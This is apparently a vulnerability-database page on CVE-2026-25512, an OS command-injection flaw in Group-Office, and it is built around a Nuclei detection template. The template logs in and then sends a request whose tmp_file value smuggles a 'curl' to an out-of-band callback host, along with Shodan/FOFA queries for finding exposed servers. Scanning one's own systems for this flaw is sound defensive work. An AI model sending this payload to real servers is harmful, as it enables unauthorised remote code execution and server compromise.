| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| Exploit for CVE-2026-25512 | 4 Feb 202622:59 | – | githubexploit | |
| CVE-2026-25512 | 4 Feb 202620:39 | – | attackerkb | |
| CVE-2026-25512 | 3 Mar 202621:02 | – | circl | |
| Group Office 操作系统命令注入漏洞 | 4 Feb 202600:00 | – | cnnvd | |
| CVE-2026-25512 | 4 Feb 202620:39 | – | cve | |
| CVE-2026-25512 Group-Office is vulnerable to RCE due to Command Injection via TNEF Attachment Handler | 4 Feb 202620:39 | – | cvelist | |
| EUVD-2026-5349 | 4 Feb 202620:39 | – | euvd | |
| CVE-2026-25512 | 4 Feb 202621:16 | – | nvd | |
| CVE-2026-25512 Group-Office is vulnerable to RCE due to Command Injection via TNEF Attachment Handler | 4 Feb 202620:39 | – | osv | |
| PT-2026-6304 | 4 Feb 202600:00 | – | ptsecurity |
id: CVE-2026-25512
info:
name: Group-Office < 26.0.5 - Remote Code Execution
author: omarkurt
severity: critical
description: |
Group-Office before versions 6.8.150, 25.0.82, and 26.0.5 is vulnerable to remote code execution via OS command injection. The endpoint email/message/tnefAttachmentFromTempFile directly concatenates the user-controlled parameter tmp_file into an exec() call. By injecting shell metacharacters into tmp_file, an authenticated attacker can execute arbitrary system commands on the server.
impact: |
Successful exploitation allows an authenticated attacker to execute arbitrary system commands with web server privileges, potentially leading to full server compromise.
remediation: |
Update Group-Office to version 6.8.150, 25.0.82, or 26.0.5 or later. The fix applies escapeshellarg() to properly escape file paths before passing them to exec().
reference:
- https://github.com/Intermesh/groupoffice/security/advisories/GHSA-579w-jvg7-frr4
- https://github.com/Intermesh/groupoffice/commit/6c612deca97a6cd2a1bd4feea0ce7e8e9d907792
- https://nvd.nist.gov/vuln/detail/CVE-2026-25512
- https://vulnerabletarget.com/VT-2026-25512
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.9
cve-id: CVE-2026-25512
cwe-id: CWE-78
epss-score: 0.18536
epss-percentile: 0.96901
metadata:
verified: true
max-request: 2
vendor: intermesh
product: group-office
shodan-query: title:"Group-Office"
fofa-query: title="Group-Office"
tags: cve,cve2026,groupoffice,rce,authenticated,oast
variables:
username: "{{username}}"
password: "{{password}}"
flow: http(1) && http(2)
http:
- raw:
- |
POST /index.php?r=core/auth/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "\"success\":true")'
condition: and
internal: true
extractors:
- type: regex
name: security_token
part: body
group: 1
regex:
- '"security_token":"([^"]+)"'
internal: true
- raw:
- |
GET /index.php?r=email/message/tnefAttachmentFromTempFile&tmp_file=dummy.dat;curl+{{interactsh-url}};%23&security_token={{security_token}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(interactsh_protocol, "dns")'
condition: and
# digest: 4a0a0047304502203b64fb57f5fbd76a120e1308dc5c0a5fc8cceacaeb8876f61353a4ccae6dc695022100b10b3bd06ddf3f93f6d9476dc8a0780f297a5ae79843e8678505a10cc4a0c036:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation